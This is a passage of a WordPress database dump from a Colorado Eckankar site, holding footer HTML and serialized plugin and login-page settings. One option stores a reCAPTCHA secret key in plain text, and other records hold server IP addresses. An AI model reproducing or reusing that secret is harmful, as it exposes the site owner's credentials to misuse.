data-font-weight=\\\"400\\\" data-font-style=\\\"\\\"><a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400; font-size: 16px;\\\" href=\\\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Gift of HU</a><br>\r\n<a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400; font-size: 16px;\\\" href=\\\"https://www.eckankar.org/blog/\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">ECK Blog</a><br>\r\n<a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400; font-size: 16px;\\\" href=\\\"https://www.eckankar.org/engage/develop-a-daily-practice/\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Spiritual Exercises</a><br>\r\n<a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-size: 16px;\\\" href=\\\"https://vimeo.com/eckankar\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Eckankar Videos</a></p>\r\n</div>\r\n\r\n<div class=\\\"col-md-3 col-sm-3 col-xs-12 col-lg-3\\\" style=\\\"text-align: left;\\\">\r\n<h4 class=\\\"\\\" style=\\\"color: #c0c0c0; text-align: left; border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 600; text-transform: none;\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"600\\\" data-font-style=\\\"\\\">Experience</h4>\r\n<p class=\\\"bg-font-family-heading\\\" style=\\\"color: #c0c0c0; text-align: left; border-width: 0px;\\\"><a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-size: 16px; font-family: \\\'Montserrat\\\'; font-weight: 400;\\\" href=\\\"https://www.eckankar.org/experience/past-lives/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Past Lives</a> <br>\r\n<a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400; font-size: 16px;\\\" href=\\\"https://www.eckankar.org/experience/dreams/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Dreams</a><br>\r\n<a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400; font-size: 16px;\\\" href=\\\"https://www.eckankar.org/experience/soul-travel/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Soul Travel</a><br>\r\n<a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400; font-size: 16px;\\\" href=\\\"https://www.eckankar.org/experience/light-and-sound/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Light and Sound</a></p>\r\n</div>\r\n<div class=\\\"col-md-3 col-sm-3 col-xs-12 col-lg-2\\\" style=\\\"text-align: left;\\\">\r\n<h4 class=\\\"\\\" style=\\\"color: #c0c0c0; text-align: left; border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 600; text-transform: none;\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"600\\\" data-font-style=\\\"\\\">Find Us</h4>\r\n<p class=\\\"bg-font-family-heading\\\" style=\\\"color: #c0c0c0; text-align: left; border-width: 0px;\\\"><a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-size: 16px; font-family: \\\'Montserrat\\\'; font-weight: 400;\\\" href=\\\"https://demo2.cloudwp.dev/trial-22xytvtx/eck-temple-of-colorado/\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Central Colorado</a> <br>\r\n<a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400; font-size: 16px;\\\" href=\\\"https://demo2.cloudwp.dev/trial-22xytvtx/colorado-springs-area/\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Colorado Springs</a><br>\r\n<a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400; font-size: 16px;\\\" href=\\\"https://demo2.cloudwp.dev/trial-22xytvtx/loveland-eck-center/\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Loveland</a><br>\r\n<a class=\\\"footerone\\\" style=\\\"border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400; font-size: 16px;\\\" href=\\\"https://demo2.cloudwp.dev/trial-22xytvtx/mountain-areas/\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Mountain Areas</a></p>\r\n</div>\r\n</div>\r\n<div class=\\\"row\\\">\r\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em;\\\">\r\n<div class=\\\"row bg-editor-hr-wrap\\\" style=\\\"width: 100%; margin: 9px auto 0px auto;\\\">\r\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\">\r\n<div>\r\n<p style=\\\"text-align: left;\\\"> </p>\r\n<div class=\\\"bg-hr\\\" style=\\\"color: #0f3d6a; margin-top: -34px; margin-bottom: -23px; text-align: left;\\\"></div>\r\n<p class=\\\"\\\" style=\\\"text-align: left;\\\"> </p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\\\"row\\\" style=\\\"padding-top: 0px; padding-bottom: 0px;\\\">\r\n<div class=\\\"col-md-12 col-sm-12 col-xs-12 col-lg-12\\\">\r\n<p class=\\\"\\\" style=\\\"color: #c0c0c0; margin-top: 0px;\\\">The terms ECKANKAR, ECK, EK, MAHANTA, SOUL TRAVEL, and VAIRAGI, among others, are trademarks of ECKANKAR, PO Box 2000, Chanhassen, MN 55317-2000 U.S.A.</p>\r\n<p class=\\\"\\\" style=\\\"color: #c0c0c0; margin-top: -9px;\\\">The opinions expressed in this website are those of the writers and not necessarily those of ECKANKAR or the Mahanta, the Living ECK Master, Sri Harold Klemp.</p>\r\n</div>\r\n</div>\r\n<div class=\\\"row\\\">\r\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"box-shadow: #cecece 0px 0px 0px 0px inset;\\\">\r\n<div class=\\\"row bg-editor-hr-wrap\\\" style=\\\"width: 100%; margin: 9px auto 0px auto;\\\">\r\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\">\r\n<div>\r\n<div>\r\n<p style=\\\"text-align: left;\\\"> </p>\r\n<div class=\\\"bg-hr\\\" style=\\\"color: #0f3d6a; margin-top: -33px; margin-bottom: -23px; text-align: left;\\\"></div>\r\n<p class=\\\"\\\" style=\\\"text-align: left;\\\"> </p>\r\n</div>\r\n<div class=\\\"row\\\">\r\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\\\"row\\\">\r\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\">\r\n<div><br>\r\n<p class=\\\"\\\" style=\\\"text-align: center; margin-top: -15px; margin-bottom: 33px;\\\"><strong><a class=\\\"footerone\\\" href=\\\"https://demo2.cloudwp.dev/trial-22xytvtx/contact-us/\\\">Contact Us</a> </strong> | <a class=\\\"footerone\\\" href=\\\"https://demo2.cloudwp.dev/trial-22xytvtx/privacy-policy/\\\"><strong>Privacy Policy</strong></a></p>\r\n</div>\r\n<div class=\\\"row\\\" style=\\\"padding-top: 0px;  text-align:center;\\\">\r\n<div class=\\\"col-md-12 col-xs-12 col-sm-12\\\">\r\n<p class=\\\"\\\" style=\\\"text-align: center; font-size: 30px; margin-top: -15px; margin-bottom: 20px; letter-spacing: 0.2em; padding: 0px;\\\">\r\n<a href=\\\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\\\"\r\n\r\n                  target=\\\"_blank\\\" class=\\\"footerone\\\" rel=\\\"noopener\\\" style=\\\"padding-right: 8px;\\\"><i\r\n\r\n                    class=\\\"fa fa-facebook\\\" aria-hidden=\\\"true\\\"></i></a><a href=\\\"http://www.youtube.com/user/ECKANKAROfficialSite\\\"\r\n\r\n                  target=\\\"_blank\\\" class=\\\"footerone\\\" rel=\\\"noopener\\\"><i class=\\\"fa fa-youtube\\\"\r\n\r\n                    aria-hidden=\\\"true\\\"></i></a> <a href=\\\"https://www.meetup.com/find/?keywords=eckankar&source=GROUPS&distance=hundredMiles&location=us--co--Denver\\\"\r\n\r\n                  target=\\\"_blank\\\" class=\\\"footerone\\\" rel=\\\"noopener\\\"><i class=\\\"fa fa-meetup\\\"\r\n\r\n                    aria-hidden=\\\"true\\\"> </i></a><a href=\\\"https://www.eckankar.org/podcasts/\\\"\r\n\r\n                  target=\\\"_blank\\\" class=\\\"footerone\\\" rel=\\\"noopener\\\" style=\\\"padding-left: 8px;\\\"><i\r\n\r\n                    class=\\\"fa fa-podcast\\\" aria-hidden=\\\"true\\\"></i></a> </p>\r\n</div>\r\n</div>\r\n	\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\\\"color-2-text-contrast bg-background-color tmpl-services-9 boldgrid-section dynamic-gridblock\\\" style=\\\"background-color: #0f3d6a;\\\">\r\n<div class=\\\"container-fluid\\\">\r\n<div class=\\\"row\\\" style=\\\"margin-bottom: 10px;\\\">\r\n<div class=\\\"col-md-6 col-sm-8 col-xs-12 align-column-bottom col-lg-12\\\">\r\n<h2 class=\\\"\\\" style=\\\"text-align: center; font-family: \\\'Open Sans\\\'; font-weight: 400; color: #c0c0c0; font-size: 15px; text-transform: capitalize;\\\" data-font-family=\\\"Open Sans\\\" data-font-weight=\\\"400\\\" data-font-style=\\\"\\\">Copyright © 2009-2023 ECKANKAR. All rights reserved.</h2>\r\n</div>\r\n	</div>\r\n	</div>\r\n	</div>\r\n','yes'),(32395,'insert-headers-and-footers_welcome_dismissed_key','1','yes'),(36367,'nav_menu_roles_db_version','1.9.5','yes'),(36376,'ure_tasks_queue','a:0:{}','yes'),(36386,'loginpress_login_redirects','','yes'),(36387,'loginpress_social_logins','','yes'),(36388,'loginpress_limit_login_attempts','','yes'),(36389,'loginpress_autologin','','yes'),(36390,'loginpress_hidelogin','','yes'),(36391,'loginpress_premium','','yes'),(37378,'colorlib-login-customizer_version','1.2.91','yes'),(37401,'login_designer_activation_date','1564715959','no'),(37739,'Admin_custome_login_Version','s:30:\"a:1:{s:7:\"Version\";s:3:\"1.0\";}\";','yes'),(37740,'Admin_custome_login_dashboard','s:44:\"a:1:{s:16:\"dashboard_status\";s:7:\"disable\";}\";','yes'),(37741,'Admin_custome_login_top','s:390:\"a:9:{s:11:\"top_bg_type\";s:23:\"static-background-image\";s:9:\"top_color\";s:7:\"#f9fad2\";s:9:\"top_image\";s:70:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/blue-bk-1.jpg\";s:9:\"top_cover\";s:3:\"yes\";s:10:\"top_repeat\";s:6:\"repeat\";s:12:\"top_position\";s:8:\"left top\";s:14:\"top_attachment\";s:5:\"fixed\";s:16:\"top_slideshow_no\";s:1:\"6\";s:23:\"top_bg_slider_animation\";s:13:\"slider-style1\";}\";','yes'),(37742,'Admin_custome_login_login','s:1494:\"a:31:{s:19:\"login_form_position\";s:7:\"default\";s:16:\"login_form_float\";s:6:\"center\";s:15:\"login_form_left\";s:3:\"700\";s:14:\"login_form_top\";s:3:\"300\";s:16:\"login_custom_css\";s:0:\"\";s:20:\"login_redirect_force\";s:2:\"no\";s:19:\"login_redirect_user\";s:0:\"\";s:24:\"login_force_redirect_url\";s:42:\"https://eckankar-colorado.org/wp-login.php\";s:13:\"login_bg_type\";s:23:\"static-background-image\";s:14:\"login_bg_color\";s:7:\"#1e73be\";s:15:\"login_bg_effect\";s:9:\"pattern-1\";s:14:\"login_bg_image\";s:93:\"https://eckankar-colorado.org/wp-content/plugins/admin-custom-login//images/3d-background.jpg\";s:18:\"login_form_opacity\";s:2:\"10\";s:16:\"login_form_width\";s:3:\"358\";s:17:\"login_form_radius\";s:2:\"10\";s:18:\"login_border_style\";s:5:\"solid\";s:21:\"login_border_thikness\";s:1:\"4\";s:18:\"login_border_color\";s:7:\"#0069A0\";s:15:\"login_bg_repeat\";s:6:\"repeat\";s:17:\"login_bg_position\";s:8:\"left top\";s:19:\"login_enable_shadow\";s:3:\"yes\";s:18:\"login_shadow_color\";s:7:\"#C8C8C8\";s:18:\"log_form_above_msg\";s:0:\"\";s:18:\"login_msg_fontsize\";s:2:\"16\";s:20:\"login_msg_font_color\";s:7:\"#000000\";s:11:\"tagline_msg\";s:187:\"Login form is designed using <a href=\"https://wordpress.org/plugins/admin-custom-login/\" target=\"_blank\">ACL</a> plugin by <a href=\"https://www.weblizar.com\" target=\"_blank\">Weblizar</a>.\";s:13:\"user_cust_lbl\";s:22:\"Type Username or Email\";s:13:\"pass_cust_lbl\";s:13:\"Type Password\";s:14:\"label_username\";s:16:\"Username / Email\";s:14:\"label_password\";s:8:\"Password\";s:17:\"label_loginButton\";s:6:\"Log In\";}\";','yes'),(37743,'Admin_custome_login_text','s:672:\"a:18:{s:18:\"heading_font_color\";s:7:\"#ffffff\";s:16:\"input_font_color\";s:7:\"#000000\";s:10:\"link_color\";s:7:\"#ffffff\";s:12:\"button_color\";s:7:\"#dd3333\";s:23:\"login_button_font_color\";s:7:\"#ffffff\";s:17:\"heading_font_size\";s:2:\"14\";s:15:\"input_font_size\";s:2:\"18\";s:9:\"link_size\";s:2:\"14\";s:16:\"button_font_size\";s:2:\"14\";s:18:\"enable_link_shadow\";s:3:\"yes\";s:17:\"link_shadow_color\";s:7:\"#ffffff\";s:18:\"heading_font_style\";s:9:\"Open Sans\";s:16:\"input_font_style\";s:9:\"Open Sans\";s:15:\"link_font_style\";s:9:\"Open Sans\";s:17:\"button_font_style\";s:9:\"Open Sans\";s:20:\"enable_inputbox_icon\";s:3:\"yes\";s:15:\"user_input_icon\";s:7:\"fa-user\";s:19:\"password_input_icon\";s:6:\"fa-key\";}\";','yes'),(37744,'Admin_custome_login_logo','s:269:\"a:5:{s:10:\"logo_image\";s:77:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ek-logo-med-blue.png\";s:10:\"logo_width\";s:2:\"64\";s:11:\"logo_height\";s:2:\"63\";s:8:\"logo_url\";s:29:\"https://eckankar-colorado.org\";s:14:\"logo_url_title\";s:23:\"Your Site Name and Info\";}\";','yes'),(37745,'Admin_custome_login_Social','s:915:\"a:21:{s:18:\"enable_social_icon\";s:5:\"outer\";s:16:\"social_icon_size\";s:6:\"mediam\";s:18:\"social_icon_layout\";s:9:\"rectangle\";s:22:\"social_link_new_window\";s:3:\"yes\";s:17:\"social_icon_color\";s:7:\"#ffffff\";s:25:\"social_icon_color_onhover\";s:7:\"#1e73be\";s:14:\"social_icon_bg\";s:7:\"#1e73be\";s:22:\"social_icon_bg_onhover\";s:7:\"#ffffff\";s:20:\"social_facebook_link\";s:19:\"http://facebook.com\";s:19:\"social_twitter_link\";s:33:\"https://twitter.com/minimalmonkey\";s:20:\"social_linkedin_link\";s:0:\"\";s:23:\"social_google_plus_link\";s:22:\"http://plus.google.com\";s:21:\"social_pinterest_link\";s:0:\"\";s:16:\"social_digg_link\";s:0:\"\";s:19:\"social_youtube_link\";s:19:\"https://youtube.com\";s:18:\"social_flickr_link\";s:18:\"https://flickr.com\";s:18:\"social_tumblr_link\";s:0:\"\";s:17:\"social_skype_link\";s:0:\"\";s:21:\"social_instagram_link\";s:21:\"https://instagram.com\";s:20:\"social_telegram_link\";s:0:\"\";s:20:\"social_whatsapp_link\";s:0:\"\";}\";','yes'),(37746,'Admin_custome_login_Slidshow','s:1021:\"a:12:{s:16:\"Slidshow_image_1\";s:91:\"https://eckankar-colorado.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_2\";s:91:\"https://eckankar-colorado.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_3\";s:91:\"https://eckankar-colorado.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_4\";s:91:\"https://eckankar-colorado.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_5\";s:91:\"https://eckankar-colorado.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_6\";s:91:\"https://eckankar-colorado.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:22:\"Slidshow_image_label_1\";s:9:\"undefined\";s:22:\"Slidshow_image_label_2\";s:9:\"undefined\";s:22:\"Slidshow_image_label_3\";s:9:\"undefined\";s:22:\"Slidshow_image_label_4\";s:9:\"undefined\";s:22:\"Slidshow_image_label_5\";s:9:\"undefined\";s:22:\"Slidshow_image_label_6\";s:9:\"undefined\";}\";','yes'),(37747,'Admin_custome_login_gcaptcha','s:91:\"a:3:{s:8:\"site_key\";s:0:\"\";s:10:\"secret_key\";s:0:\"\";s:21:\"login_enable_gcaptcha\";s:2:\"no\";}\";','yes'),(37911,'plugin_erident_settings','a:37:{s:19:\"dashboard_data_left\";s:0:\"\";s:20:\"dashboard_data_right\";s:0:\"\";s:12:\"top_bg_color\";s:7:\"#ffffff\";s:12:\"top_bg_image\";s:71:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/login-bk-7.jpg\";s:13:\"top_bg_repeat\";s:9:\"no-repeat\";s:11:\"top_bg_xpos\";s:3:\"top\";s:11:\"top_bg_ypos\";s:4:\"left\";s:11:\"top_bg_size\";s:4:\"auto\";s:20:\"dashboard_image_logo\";s:77:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ek-logo-med-blue.png\";s:26:\"dashboard_image_logo_width\";s:2:\"66\";s:27:\"dashboard_image_logo_height\";s:2:\"65\";s:20:\"dashboard_power_text\";s:31:\"Powered by Eckankar In Colorado\";s:21:\"dashboard_login_width\";s:3:\"350\";s:22:\"dashboard_login_radius\";s:2:\"10\";s:22:\"dashboard_login_border\";s:5:\"solid\";s:22:\"dashboard_border_thick\";s:1:\"1\";s:22:\"dashboard_border_color\";s:7:\"#ebebeb\";s:18:\"dashboard_login_bg\";s:7:\"#ffffff\";s:26:\"dashboard_login_bg_opacity\";s:3:\"0.5\";s:14:\"login_bg_image\";s:0:\"\";s:15:\"login_bg_repeat\";s:6:\"repeat\";s:13:\"login_bg_xpos\";s:3:\"top\";s:13:\"login_bg_ypos\";s:4:\"left\";s:20:\"dashboard_text_color\";s:7:\"#23507d\";s:25:\"dashboard_label_text_size\";s:2:\"14\";s:26:\"dashboard_input_text_color\";s:7:\"#555555\";s:25:\"dashboard_input_text_size\";s:2:\"24\";s:20:\"dashboard_link_color\";s:7:\"#21759B\";s:22:\"dashboard_check_shadow\";s:2:\"No\";s:21:\"dashboard_link_shadow\";s:7:\"#ffffff\";s:27:\"dashboard_check_form_shadow\";s:3:\"Yes\";s:21:\"dashboard_form_shadow\";s:7:\"#C8C8C8\";s:22:\"dashboard_button_color\";s:7:\"#5E5E5E\";s:27:\"dashboard_button_text_color\";s:7:\"#FFFFFF\";s:25:\"dashboard_check_lost_pass\";s:3:\"Yes\";s:26:\"dashboard_check_backtoblog\";s:2:\"No\";s:19:\"dashboard_delete_db\";s:2:\"No\";}','yes'),(38284,'code_snippets_version','3.6.2','yes'),(38285,'code_snippets_settings','a:3:{s:7:\"general\";a:6:{s:19:\"activate_by_default\";b:1;s:21:\"snippet_scope_enabled\";b:1;s:11:\"enable_tags\";b:1;s:18:\"enable_description\";b:1;s:13:\"disable_prism\";b:0;s:18:\"complete_uninstall\";b:0;}s:18:\"description_editor\";a:3:{s:4:\"rows\";i:5;s:12:\"use_full_mce\";b:0;s:13:\"media_buttons\";b:0;}s:6:\"editor\";a:8:{s:5:\"theme\";s:7:\"default\";s:16:\"indent_with_tabs\";b:1;s:8:\"tab_size\";i:4;s:11:\"indent_unit\";i:4;s:10:\"wrap_lines\";b:1;s:12:\"line_numbers\";b:1;s:19:\"auto_close_brackets\";b:1;s:27:\"highlight_selection_matches\";b:1;}}','yes'),(38289,'recently_activated_snippets','a:0:{}','yes'),(38715,'login_nocaptcha_message_type','notice-error','yes'),(38716,'login_nocaptcha_error','Login NoCaptcha has not been properly configured. <a href=\"options-general.php?page=login-recaptcha/admin.php\">Click here</a> to configure.','yes'),(38717,'login_nocaptcha_key','6LcydLsSAAAAAKY_OLZyhAIbgioGmuQM-HlwndQg','yes'),(38718,'login_nocaptcha_secret','6LcydLsSAAAAAGzYaNvLp5G-LL4zhoFVu5EafYGG','yes'),(38719,'login_nocaptcha_whitelist','','yes'),(39070,'fs_active_plugins','O:8:\"stdClass\":0:{}','yes'),(39071,'fs_debug_mode','','yes'),(39072,'fs_accounts','a:6:{s:21:\"id_slug_type_path_map\";a:4:{i:1938;a:2:{s:4:\"slug\";s:17:\"content-protector\";s:4:\"type\";s:6:\"plugin\";}i:147;a:3:{s:4:\"slug\";s:11:\"popup-maker\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:27:\"popup-maker/popup-maker.php\";}i:3069;a:3:{s:4:\"slug\";s:19:\"the-events-calendar\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:43:\"the-events-calendar/the-events-calendar.php\";}i:1252;a:3:{s:4:\"slug\";s:9:\"basepress\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:23:\"basepress/basepress.php\";}}s:11:\"plugin_data\";a:4:{s:17:\"content-protector\";a:20:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:9:\"prev_path\";s:39:\"content-protector/content-protector.php\";}s:17:\"install_timestamp\";i:1564966667;s:16:\"sdk_last_version\";s:6:\"2.5.10\";s:11:\"sdk_version\";s:5:\"2.6.0\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"4.2.5\";s:14:\"plugin_version\";s:5:\"4.2.6\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:21:\"is_plugin_new_install\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:21:\"eckankar-colorado.org\";s:9:\"server_ip\";s:12:\"98.245.64.80\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1564966667;s:7:\"version\";s:5:\"3.2.3\";}s:17:\"was_plugin_loaded\";b:1;s:15:\"prev_is_premium\";b:0;s:21:\"trial_promotion_shown\";i:1691154541;s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:2:\"15\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1565627481;s:7:\"version\";s:5:\"3.2.3\";}s:20:\"is_network_activated\";b:0;s:30:\"affiliate_program_notice_shown\";i:1666202657;s:19:\"last_load_timestamp\";i:1699996076;}s:11:\"popup-maker\";a:13:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:27:\"popup-maker/popup-maker.php\";}s:17:\"install_timestamp\";i:1566097236;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:5:\"2.2.4\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:6:\"1.8.10\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:21:\"is_plugin_new_install\";b:1;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:21:\"eckankar-colorado.org\";s:9:\"server_ip\";s:12:\"98.245.64.80\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1566097236;s:7:\"version\";s:6:\"1.8.10\";}s:17:\"was_plugin_loaded\";b:1;}s:19:\"the-events-calendar\";a:16:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:43:\"the-events-calendar/the-events-calendar.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1569605438;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:7:\"5.3.1.1\";s:14:\"plugin_version\";s:5:\"5.2.1\";s:19:\"plugin_upgrade_mode\";b:0;s:21:\"plugin_downgrade_mode\";b:1;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:21:\"eckankar-colorado.org\";s:9:\"server_ip\";s:12:\"98.245.64.80\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1569605438;s:7:\"version\";s:5:\"4.9.9\";}s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:15:\"prev_is_premium\";b:0;s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1577675995;s:7:\"version\";s:6:\"4.9.13\";}}s:9:\"basepress\";a:16:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:23:\"basepress/basepress.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1635699146;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:1;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:6:\"2.15.4\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:21:\"eckankar-colorado.org\";s:9:\"server_ip\";s:14:\"67.174.179.105\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1635699146;s:7:\"version\";s:6:\"2.15.4\";}s:15:\"prev_is_premium\";b:0;s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1635699168;s:7:\"version\";s:6:\"2.15.4\";}}}s:13:\"file_slug_map\";a:4:{s:39:\"content-protector/content-protector.php\";s:17:\"content-protector\";s:27:\"popup-maker/popup-maker.php\";s:11:\"popup-maker\";s:43:\"the-events-calendar/the-events-calendar.php\";s:19:\"the-events-calendar\";s:23:\"basepress/basepress.php\";s:9:\"basepress\";}s:7:\"plugins\";a:4:{s:17:\"content-protector\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:8:\"Passster\";s:4:\"slug\";s:17:\"content-protector\";s:12:\"premium_slug\";s:25:\"content-protector-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";s:8:\"selected\";s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:39:\"content-protector/content-protector.php\";s:7:\"version\";s:5:\"4.2.6\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_9d9d6d17bd34372b199f36e37dd4b\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"1938\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:11:\"popup-maker\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:11:\"Popup Maker\";s:4:\"slug\";s:11:\"popup-maker\";s:12:\"premium_slug\";s:19:\"popup-maker-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:27:\"popup-maker/popup-maker.php\";s:7:\"version\";s:6:\"1.8.10\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_0a02cbd99443e0ab7211b19222fe3\";s:10:\"secret_key\";N;s:2:\"id\";s:3:\"147\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:1;}s:19:\"the-events-calendar\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:19:\"The Events 